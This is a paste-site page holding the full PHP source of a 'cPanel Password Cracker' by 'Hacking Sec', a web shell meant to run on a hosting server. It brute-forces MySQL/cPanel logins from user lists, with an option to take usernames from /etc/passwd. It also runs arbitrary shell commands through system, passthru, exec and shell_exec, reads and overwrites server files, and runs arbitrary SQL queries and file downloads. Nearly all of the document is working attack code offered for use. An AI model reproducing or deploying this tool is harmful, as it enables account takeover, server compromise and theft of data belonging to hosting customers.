cPanel Password Cracker

From x, 3 Years ago, written in Plain Text, viewed 814 times.
URL http://paste.security-portal.cz/view/b320ddcb Embed
Download Paste or View Raw
  1. <html>
  2. <title>cPanel Password Cracker</title>
  3. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  4. <?php
  5. /*
  6. Cpanel Cracker By Hacking Sec
  7. */
  8. @set_time_limit(0);
  9. @error_reporting(0);
  10.  
  11.  
  12. echo '<head>
  13.  
  14. <style type="text/css">
  15. <!--
  16. body {
  17.         background-color: #000000;
  18.     font-size: 18px;
  19.         color: #cccccc;
  20. }
  21. input,textarea,select{
  22. font-weight: bold;
  23. color: #cccccc;
  24. dashed #ffffff;
  25. border: 1px
  26. solid #2C2C2C;
  27. background-color: #080808
  28. }
  29. a {
  30.         background-color: #151515;
  31.         vertical-align: bottom;
  32.         color: #000;
  33.         text-decoration: none;
  34.         font-size: 20px;
  35.         margin: 8px;
  36.         padding: 6px;
  37.         border: thin solid #000;
  38. }
  39. a:hover {
  40.         background-color: #080808;
  41.         vertical-align: bottom;
  42.         color: #333;
  43.         text-decoration: none;
  44.         font-size: 20px;
  45.         margin: 8px;
  46.         padding: 6px;
  47.         border: thin solid #000;
  48. }
  49. .style1 {
  50.         text-align: center;
  51. }
  52. .style2 {
  53.         color: #FFFFFF;
  54.         font-weight: bold;
  55. }
  56. .style3 {
  57.         color: #FFFFFF;
  58. }
  59. -->
  60. </style>
  61.  
  62. </head>
  63. ';
  64.  
  65.  
  66. function in($type,$name,$size,$value,$checked=0)
  67.  {
  68.  $ret = "<input type=".$type." name=".$name." "; if($size != 0)
  69.  {
  70.  $ret .= "size=".$size." "; }
  71.  $ret .= "value=\"".$value."\""; if($checked) $ret .= " checked"; return $ret.">"; }
  72.  
  73. class my_sql
  74.  {
  75.  var $host = 'localhost'; var $port = ''; var $user = ''; var $pass = ''; var $base = ''; var $db = ''; var $connection; var $res; var $error; var $rows; var $columns; var $num_rows; var $num_fields; var $dump; function connect()
  76.  {
  77.  switch($this->db)
  78.  {
  79.  case 'MySQL': if(empty($this->port))
  80.  {
  81.  $this->port = '3306'; }
  82.  if(!function_exists('mysql_connect')) return 0; $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass); if(is_resource($this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(empty($this->port))
  83.  {
  84.  $this->port = '1433'; }
  85.  if(!function_exists('mssql_connect')) return 0; $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass); if($this->connection) return 1; $this->error = "Can't connect to server"; break; case 'PostgreSQL': if(empty($this->port))
  86.  {
  87.  $this->port = '5432'; }
  88.  $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'"; if(!function_exists('pg_connect')) return 0; $this->connection = @pg_connect($str); if(is_resource($this->connection)) return 1; $this->error = @pg_last_error($this->connection); break; case 'Oracle': if(!function_exists('ocilogon')) return 0; $this->connection = @ocilogon($this->user, $this->pass, $this->base); if(is_resource($this->connection)) return 1; $error = @ocierror(); $this->error=$error['message']; break; }
  89.  return 0; }
  90.  function select_db()
  91.  {
  92.  switch($this->db)
  93.  {
  94.  case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1; $this->error = @mysql_errno()." : ".@mysql_error(); break; case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1; $this->error = "Can't select database"; break; case 'PostgreSQL': return 1; break; case 'Oracle': return 1; break; }
  95.  return 0; }
  96.  function query($query)
  97.  {
  98.  $this->res=$this->error=''; switch($this->db)
  99.  {
  100.  case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
  101.  {
  102.  $this->error = @mysql_error($this->connection); return 0; }
  103.  else if(is_resource($this->res))
  104.  {
  105.  return 1; }
  106.  return 2; break; case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection)))
  107.  {
  108.  $this->error = 'Query error'; return 0; }
  109.  else if(@mssql_num_rows($this->res) > 0)
  110.  {
  111.  return 1; }
  112.  return 2; break; case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query)))
  113.  {
  114.  $this->error = @pg_last_error($this->connection); return 0; }
  115.  else if(@pg_num_rows($this->res) > 0)
  116.  {
  117.  return 1; }
  118.  return 2; break; case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query)))
  119.  {
  120.  $this->error = 'Query parse error'; }
  121.  else
  122.  {
  123.  if(@ociexecute($this->res))
  124.  {
  125.  if(@ocirowcount($this->res) != 0) return 2; return 1; }
  126.  $error = @ocierror(); $this->error=$error['message']; }
  127.  break; }
  128.  return 0; }
  129.  function get_result()
  130.  {
  131.  $this->rows=array(); $this->columns=array(); $this->num_rows=$this->num_fields=0; switch($this->db)
  132.  {
  133.  case 'MySQL': $this->num_rows=@mysql_num_rows($this->res); $this->num_fields=@mysql_num_fields($this->res); while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res))); @mysql_free_result($this->res); if($this->num_rows)
  134.  {
  135. $this->columns = @array_keys($this->rows[0]); return 1;}
  136.  break; case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res); $this->num_fields=@mssql_num_fields($this->res); while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res))); @mssql_free_result($this->res); if($this->num_rows)
  137.  {
  138. $this->columns = @array_keys($this->rows[0]); return 1;}
  139. ; break; case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res); $this->num_fields=@pg_num_fields($this->res); while(false !== ($this->rows[] = @pg_fetch_assoc($this->res))); @pg_free_result($this->res); if($this->num_rows)
  140.  {
  141. $this->columns = @array_keys($this->rows[0]); return 1;}
  142.  break; case 'Oracle': $this->num_fields=@ocinumcols($this->res); while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++; @ocifreestatement($this->res); if($this->num_rows)
  143.  {
  144. $this->columns = @array_keys($this->rows[0]); return 1;}
  145.  break; }
  146.  return 0; }
  147.  function dump($table)
  148.  {
  149.  if(empty($table)) return 0; $this->dump=array(); $this->dump[0] = '##'; $this->dump[1] = '## --------------------------------------- '; $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s"); $this->dump[3] = '## Database: '.$this->base; $this->dump[4] = '##    Table: '.$table; $this->dump[5] = '## --------------------------------------- '; switch($this->db)
  150.  {
  151.  case 'MySQL': $this->dump[0] = '## MySQL dump'; if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; $this->dump[] = $this->rows[0]['Create Table'].";"; $this->dump[] = '## --------------------------------------- '; if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  152.  {
  153.  foreach($this->rows[$i] as $k=>$v)
  154.  {
  155. $this->rows[$i][$k] = @mysql_real_escape_string($v);}
  156.  $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  157.  break; case 'MSSQL': $this->dump[0] = '## MSSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  158.  {
  159.  foreach($this->rows[$i] as $k=>$v)
  160.  {
  161. $this->rows[$i][$k] = @addslashes($v);}
  162.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  163.  break; case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump'; if($this->query('SELECT * FROM '.$table)!=1) return 0; if(!$this->get_result()) return 0; for($i=0;$i<$this->num_rows;$i++)
  164.  {
  165.  foreach($this->rows[$i] as $k=>$v)
  166.  {
  167. $this->rows[$i][$k] = @addslashes($v);}
  168.  $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');'; }
  169.  break; case 'Oracle': $this->dump[0] = '## ORACLE dump'; $this->dump[] = '## under construction'; break; default: return 0; break; }
  170.  return 1; }
  171.  function close()
  172.  {
  173.  switch($this->db)
  174.  {
  175.  case 'MySQL': @mysql_close($this->connection); break; case 'MSSQL': @mssql_close($this->connection); break; case 'PostgreSQL': @pg_close($this->connection); break; case 'Oracle': @oci_close($this->connection); break; }
  176.  }
  177.  function affected_rows()
  178.  {
  179.  switch($this->db)
  180.  {
  181.  case 'MySQL': return @mysql_affected_rows($this->res); break; case 'MSSQL': return @mssql_affected_rows($this->res); break; case 'PostgreSQL': return @pg_affected_rows($this->res); break; case 'Oracle': return @ocirowcount($this->res); break; default: return 0; break; }
  182.  }
  183.  }
  184.  if(!empty($_POST['cccc']) && $_POST['cccc']=="download_file" && !empty($_POST['d_name']))
  185.  {
  186.  if(!$file=@fopen($_POST['d_name'],"r"))
  187.  {
  188.  err(1,$_POST['d_name']); $_POST['cccc']=""; }
  189.  else
  190.  {
  191.  @ob_clean(); $filename = @basename($_POST['d_name']); $filedump = @fread($file,@filesize($_POST['d_name'])); fclose($file); $content_encoding=$mime_type=''; compress($filename,$filedump,$_POST['compress']); if (!empty($content_encoding))
  192.  {
  193.  header('Content-Encoding: ' . $content_encoding); }
  194.  header("Content-type: ".$mime_type); header("Content-disposition: attachment; filename=\"".$filename."\";"); echo $filedump; exit(); }
  195.  }
  196.  if(isset($_GET['phpinfo']))
  197.  {
  198.  echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  199.  if (!empty($_POST['cccc']) && $_POST['cccc']=="db_query")
  200.  {
  201.  echo $head; $sql = new my_sql(); $sql->db = $_POST['db']; $sql->host = $_POST['db_server']; $sql->port = $_POST['db_port']; $sql->user = $_POST['mysql_l']; $sql->pass = $_POST['mysql_p']; $sql->base = $_POST['mysql_db']; $querys = @explode(';',$_POST['db_query']); echo '<body bgcolor=#e4e0d8>'; if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  202.  {
  203.  if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>".$sql->error."</b></font></div>"; else
  204.  {
  205.  foreach($querys as $num=>$query)
  206.  {
  207.  if(strlen($query)>5)
  208.  {
  209.  echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>"; switch($sql->query($query))
  210.  {
  211.  case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>"; break; case '1': if($sql->get_result())
  212.  {
  213.  echo "<table width=100%>"; foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES); $keys = @implode("&nbsp;</b></font></td><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;", $sql->columns); echo "<tr><td bgcolor=#800000><font face=Verdana size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>"; for($i=0;$i<$sql->num_rows;$i++)
  214.  {
  215.  foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES); $values = @implode("&nbsp;</font></td><td><font face=Verdana size=-2>&nbsp;",$sql->rows[$i]); echo '<tr><td><font face=Verdana size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>'; }
  216.  echo "</table>"; }
  217.  break; case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0'); echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>"; break; }
  218.  }
  219.  }
  220.  }
  221.  }
  222.  echo "<br><title>Cpanel Cracker by C0die r00t</title><form name=form method=POST>";
  223.  echo in('hidden','db',0,$_POST['db']); echo in('hidden','db_server',0,$_POST['db_server']); echo in('hidden','db_port',0,$_POST['db_port']); echo in('hidden','mysql_l',0,$_POST['mysql_l']); echo in('hidden','mysql_p',0,$_POST['mysql_p']); echo in('hidden','mysql_db',0,$_POST['mysql_db']); echo in('hidden','cccc',0,'db_query');
  224.  echo "<div align=center>"; echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>"; echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>"; echo "</form>"; echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  225.  
  226.  
  227.  
  228.  
  229.  
  230.  
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239.  
  240.  
  241.  
  242.  
  243.  
  244.  
  245.  
  246.  
  247.  
  248. function ccmmdd($ccmmdd2,$att)
  249. {
  250. global $ccmmdd2,$att;
  251. echo '
  252. <table style="width: 100%" class="style1" dir="rtl">
  253.         <tr>
  254.                 <td class="style9"><strong>ăćĚÉ ÇáĂćăŃ</strong></td>
  255.         </tr>
  256.         <tr>
  257.                 <td class="style13">
  258.                                 <form method="post">
  259.                                         <select name="att" dir="rtl" style="height: 109px" size="6">
  260. ';
  261. if($_POST['att']==null)
  262. {
  263. echo '                                          <option value="system" selected="">system</option>';
  264. }else{
  265. echo "                                          <option value='$_POST[att]' selected=''>$_POST[att]</option>
  266.                                                 <option value=system>system</option>
  267. ";
  268.  
  269.                                                
  270. }
  271.  
  272. echo '
  273.                                                 <option value="passthru">passthru</option>
  274.                                                 <option value="exec">exec</option>
  275.                                                 <option value="shell_exec">shell_exec</option> 
  276.                                         </select>
  277.                                                 <input name="page" value="ccmmdd" type="hidden"><br>
  278.                                                 <input dir="ltr" name="ccmmdd2" style="width: 173px" type="text" value="';if(!$_POST['ccmmdd2']){echo 'dir';}else{echo $_POST['ccmmdd2'];}echo '"><br>
  279.                                                 <input type="submit" value="ĘäÝíĐ">
  280.                                 </form>
  281.                
  282.                 </td>
  283.         </tr>
  284.         <tr>
  285.                 <td class="style13">
  286. ';
  287.  
  288.                 if($_POST[att]=='system')
  289.                 {
  290. echo '
  291.                                         <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  292.                                         system($_POST['ccmmdd2']);
  293. echo '                                  </textarea>';
  294.  
  295.  
  296.                 }
  297.  
  298.                 if($_POST[att]=='passthru')
  299.                 {
  300. echo '
  301.                                         <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  302.                                         passthru($_POST['ccmmdd2']);
  303. echo '                                  </textarea>';
  304.  
  305.  
  306.                 }
  307.  
  308.                
  309.  
  310.  
  311.  
  312.                 if($_POST[att]=='exec')
  313.                 {
  314.  
  315. echo '                                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  316.                                         exec($_POST['ccmmdd2'],$res);
  317.                                 echo $res = join("\n",$res);                           
  318. echo '                                  </textarea>';
  319.  
  320.  
  321.                 }
  322.  
  323.  
  324.  
  325.  
  326.  
  327.  
  328.  
  329.                 if($_POST[att]=='shell_exec')
  330.                 {
  331.  
  332. echo '                                  <textarea dir="ltr" name="TextArea1" style="width: 745px; height: 204px">';
  333.                                 echo    shell_exec($_POST['ccmmdd2']);
  334. echo '                                  </textarea>';
  335.  
  336.  
  337.                 }
  338. echo '         
  339.                 </td>
  340.         </tr>
  341. </table>
  342. ';
  343.  
  344. exit;
  345. }
  346.  
  347. if($_POST['page']=='edit')
  348. {
  349.  
  350. $code=@str_replace("\r\n","\n",$_POST['code']);
  351. $code=@str_replace('\\','',$code);
  352. $fp = fopen($pathclass, 'w');
  353. fwrite($fp,"$code");
  354. fclose($fp);
  355. echo "<center><b>OK Edit<br><br><br><br><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  356. exit;
  357. }      
  358.  
  359.  
  360.  
  361.  
  362.  
  363.  
  364.  
  365.         if($_POST['page']=='show')
  366.         {
  367.         $pathclass =$_POST['pathclass'];
  368. echo '
  369. <form method="POST">
  370. <input type="hidden" name="page" value="edit">
  371. ';
  372.        
  373.         $sahacker = fopen($pathclass, "rb");
  374. echo '<center>'.$pathclass.'<br><textarea dir="ltr" name="code" style="width: 845px; height: 404px">'; 
  375. $code = fread($sahacker, filesize($pathclass));
  376. echo $code =htmlspecialchars($code);
  377. echo '</textarea>';    
  378.         fclose($sahacker);
  379. echo '
  380. <br><input type="text" name="pathclass" value="'.$pathclass.'" style="width: 445px;">
  381. <br><strong><input type="submit" value="edit file">
  382. </form>
  383. ';
  384.                 exit;
  385.         }
  386.  
  387.  
  388.  
  389.  
  390.         if($_POST['page']=='ccmmdd')
  391.         {
  392.         echo ccmmdd($ccmmdd2,$att);
  393.         exit;
  394.         }
  395.  
  396.  
  397.  
  398.  
  399.  
  400.  
  401.  
  402.  
  403.  
  404.  
  405.  
  406.  
  407.  
  408.  
  409.  
  410.  
  411.  
  412.  
  413.  
  414.  
  415.  
  416.  
  417.  
  418.  
  419. if($_POST['page']=='find')
  420. {
  421. if(isset($_POST['usernames']) && isset($_POST['passwords']))
  422. {
  423.     if($_POST['type'] == 'passwd'){
  424.         $e = explode("\n",$_POST['usernames']);
  425.         foreach($e as $value){
  426.         $k = explode(":",$value);
  427.         $username .= $k['0']." ";
  428.         }
  429.     }elseif($_POST['type'] == 'simple'){
  430.         $username = str_replace("\n",' ',$_POST['usernames']);
  431.     }
  432.     $a1 = explode(" ",$username);
  433.     $a2 = explode("\n",$_POST['passwords']);
  434.     $id2 = count($a2);
  435.     $ok = 0;
  436.     foreach($a1 as $user )
  437.     {
  438.         if($user !== '')
  439.         {
  440.         $user=trim($user);
  441.          for($i=0;$i<=$id2;$i++)
  442.          {
  443.             $pass = trim($a2[$i]);
  444.             if(@mysql_connect('localhost',$user,$pass))
  445.             {
  446.                 echo "Hacking Sec~ user is (<b><font color=green>$user</font></b>) Password is (<b><font color=green>$pass</font></b>)<br />";
  447.                 $ok++;
  448.             }
  449.          }
  450.         }
  451.     }
  452.     echo "<hr><b>You Found <font color=green>$ok</font> Cpanel (Hacking Sec)</b>";
  453.     echo "<center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
  454.     exit;
  455. }
  456. }
  457. ?>
  458.  
  459.  
  460.  
  461.  
  462. <form method="POST" target="_blank">
  463.         <strong>
  464. <input name="page" type="hidden" value="find">                                 
  465.     </strong>
  466.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
  467.     <tr>
  468.         <td valign="top" bgcolor="#151515"><center><strong><img src="http://www.medianama.com/wp-content/uploads/anonymous.jpg" /><br>
  469.                 </strong>
  470.                 <a href="http://www.hackingsec.in" class="style2"><strong>Cpanel Cracker By Hacking Sec</strong></a></center></td>
  471.     </tr>
  472.     <tr>
  473.     <td>
  474.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
  475.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  476.         <strong>User :</strong></td>
  477.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="usernames"></textarea></strong></td>
  478.     </tr>
  479.     <tr>
  480.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  481.         <strong>Pass :</strong></td>
  482.     <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="40" rows="10" name="passwords"></textarea></strong></td>
  483.     </tr>
  484.     <tr>
  485.     <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
  486.         <strong>Type :</strong></td>
  487.     <td valign="top" bgcolor="#151515" colspan="5">
  488.     <span class="style2"><strong>Simple : </strong> </span>
  489.         <strong>
  490.         <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
  491.     <font class="style2"><strong>/etc/passwd : </strong> </font>
  492.         <strong>
  493.         <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
  494.         </strong>
  495.         </span>
  496.     </td>
  497.     </tr>
  498.     <tr>
  499.     <td valign="top" bgcolor="#151515" style="width: 139px"></td>
  500.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="start">
  501.     </strong>
  502.     </td>
  503.     <tr>
  504. </form>    
  505.    
  506.     <td valign="top" colspan="6"><strong></strong></td>
  507.  
  508. <form method="POST" target="_blank">
  509. <strong>
  510. <input type="hidden" name="go" value="cmd_mysql">
  511.         </strong>
  512.         <tr>
  513.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD MYSQL</strong></td>
  514.                                 </tr>
  515.         <tr>
  516.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>user</strong></td>
  517.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_l" type="text"></strong></td>
  518.     <td valign="top" bgcolor="#151515"><strong>pass</strong></td>
  519.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_p" type="text"></strong></td>
  520.     <td valign="top" bgcolor="#151515"><strong>database</strong></td>
  521.     <td valign="top" bgcolor="#151515"><strong><input name="mysql_db" type="text"></strong></td>
  522.                                 </tr>
  523.                                         <tr>
  524.     <td valign="top" bgcolor="#151515" style="height: 25px; width: 139px;">
  525.         <strong>cmd ~</strong></td>
  526.     <td valign="top" bgcolor="#151515" colspan="5" style="height: 25px">
  527.         <strong>
  528.         <textarea name="db_query" style="width: 353px; height: 89px">SHOW DATABASES;
  529. SHOW TABLES user_vb ;
  530. SELECT * FROM user;
  531. SELECT version();
  532. SELECT user();</textarea></strong></td>
  533.         </tr>
  534.                 <tr>
  535.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  536.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="run"></strong></td>
  537.         </tr>
  538. <input name="db" value="MySQL" type="hidden">
  539. <input name="db_server" type="hidden" value="localhost">
  540. <input name="db_port" type="hidden" value="3306">
  541. <input name="cccc" type="hidden" value="db_query">
  542.        
  543. </form>        
  544.                 <tr>
  545.     <td valign="top" bgcolor="#151515" colspan="6"><strong></strong></td>
  546.  
  547.  
  548.                 </tr>
  549.                
  550. <form method="POST" target="_blank">
  551.                 <tr>
  552.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>CMD
  553.         system - passthru - exec - shell_exec</strong></td>
  554.                                 </tr>
  555.                 <tr>
  556.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>cmd ~</strong></td>
  557.     <td valign="top" bgcolor="#151515" colspan="5">
  558.                                         <select name="att" dir="rtl"  size="1">
  559. <?php
  560. if($_POST['att']==null)
  561. {
  562. echo '                                          <option value="system" selected="">system</option>';
  563. }else{
  564. echo "                                          <option value='$_POST[att]' selected=''>$_POST[att]</option>
  565.                                                 <option value=system>system</option>
  566. ";
  567.  
  568.                                                
  569. }
  570. ?>
  571.  
  572.                                                 <option value="passthru">passthru</option>
  573.                                                 <option value="exec">exec</option>
  574.                                                 <option value="shell_exec">shell_exec</option>
  575.                                         </select>    
  576.     <strong>
  577. <input name="page" type="hidden" value="ccmmdd">    
  578.         <input name="ccmmdd2" type="text" style="width: 284px" value="ls -la"></strong></td>
  579.         </tr>
  580.                 <tr>
  581.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  582.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="go"></strong></td>
  583.         </tr>
  584. </form>                
  585.  
  586. <form method="POST" target="_blank">
  587.  
  588.                 <tr>
  589.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Show
  590.         File And Edit</strong></td>
  591.                                 </tr>
  592.                 <tr>
  593.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Path ~</strong></td>
  594.     <td valign="top" bgcolor="#151515" colspan="5">
  595.         <strong>
  596.         <input name="pathclass" type="text" style="width: 284px" value="<?php echo realpath('')?>"></strong></td>
  597.         </tr>
  598.                 <tr>
  599.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  600.     <td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="show"></strong></td>
  601.                                 </tr>
  602. <input name="page" type="hidden" value="show">                                 
  603. </form>                                
  604.                                         <tr>
  605.     <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
  606.         Security</strong></td>
  607.                                 </tr>
  608.         <tr>
  609.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
  610.     <td valign="top" bgcolor="#151515" colspan="5">
  611.         <strong>
  612. <?php
  613. $safe_mode = ini_get('safe_mode');
  614. if($safe_mode=='1')
  615. {
  616. echo 'ON';
  617. }else{
  618. echo 'OFF';
  619. }
  620.  
  621. ?>     
  622.         </strong>      
  623.         </td>
  624.                                 </tr>
  625.     <tr>
  626.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Function</strong></td>
  627.     <td valign="top" bgcolor="#151515" colspan="5">
  628.         <strong>
  629. <?php
  630. if(''==($func=@ini_get('disable_functions')))
  631. {
  632. echo "<font color=#00800F>No Security for Function</font></b>";
  633. }else{
  634. echo "<font color=red>$func</font></b>";
  635. }
  636. ?></strong></td>
  637.     <tr>
  638.     <td valign="top" bgcolor="#151515" style="width: 139px"><strong></strong></td>
  639.     <td valign="top" bgcolor="#151515" colspan="5"><strong></strong></td>
  640.     </table>
  641.     </td>
  642.     </tr>
  643.     </table>
  644.        
  645.        
  646.        
  647.        
  648.         <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head><body></body></html>
  649.  
  650.  
  651.  
  652.  
  653.  
  654.       <form style="border: 0px ridge #FFFFFF">
  655.  
  656.  
  657.  
  658.  
  659.     <p align="center"></td>
  660.   </tr><div align="center">
  661.  
  662.                 <tr>
  663.  
  664.  
  665.  
  666. <input type="submit"   name="user" value="user"><option value="name"></select>
  667. </form>
  668.  
  669.  
  670. <div align="center">
  671.  <table border="5" width="10%" bordercolorlight="#008000" bordercolordark="#006A00" height="100" cellspacing="5">
  672. <tr>
  673. <td bordercolorlight="#008000" bordercolordark="#006A00">
  674. <p align="left">
  675. <textarea  method='POST' rows="25" name="S1" cols="16">
  676.  
  677.  
  678. <?php
  679.  
  680.  
  681.  
  682.       if ($_GET['user'] )
  683.  
  684.  
  685.       system('ls /var/mail');
  686.  
  687.  
  688.  
  689.  
  690.  
  691.                                            for($uid=0;$uid<90000;$uid++){
  692.  
  693.                                         }
  694.  
  695.  
  696.  
  697.  
  698. ?></textarea>

Replies to cPanel Password Cracker rss

Title Name Language When
Re: cPanel Password Cracker Sweet Dolphin text 4 Months ago.
Re: cPanel Password Cracker Damla javascript 1 Year ago.

Reply to "cPanel Password Cracker"

Here you can reply to the paste above